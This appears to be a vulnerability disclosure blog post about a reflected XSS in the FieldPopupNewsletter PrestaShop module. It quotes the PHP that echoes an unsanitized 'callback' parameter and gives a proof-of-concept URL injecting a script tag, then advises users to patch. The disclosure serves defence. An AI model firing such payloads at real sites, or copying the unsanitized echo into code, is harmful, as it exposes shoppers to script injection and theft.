This blog post details an XSS we found within the FieldPopupNewsletter module, developed by FieldThemes, for the popular ecommerce platform Prestashop.

The module contains a file called ajax.php with the following code:

$ppp = new FieldPopupNewsletter();
echo $ppp->newsletterRegistration($_POST['email']);

The newsletterRegistration function, called by the ajax.php file, contains code that lacks proper input validation:

public function newsletterRegistration($email) {
    if (empty($email) || !Validate::isEmail($email)) {
        echo $_GET['callback'] . '(' . json_encode(array('<p class="alert alert-danger">' . $this->l('Invalid email address.') . '</p>')) . ')';
        return;
    }

The callback GET parameter is printed to the page without sanitization which makes it susceptibvle to XSS. One might think the fact a POST parameter is used might mitigate this vulnerability but closer reading reveals this works when $_POST['email'] isn’t set.

Proof of Concept

As a demonstration of the vulnerability, an attacker can craft a malicious URL, like the one shown below, to execute arbitrary JavaScript code on the target user’s browser:

http://localhost/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(0)%3C/script%3E

Conclusion

XSS vulnerabilities are serious security risks that can lead to unauthorized access, data theft, and other malicious activities. In the case of the FieldPopupNewsletter module, a lack of input validation exposes users to potential attacks.

We strongly advise users of this module to update to the latest patched version, which should address the XSS vulnerability.

Timeline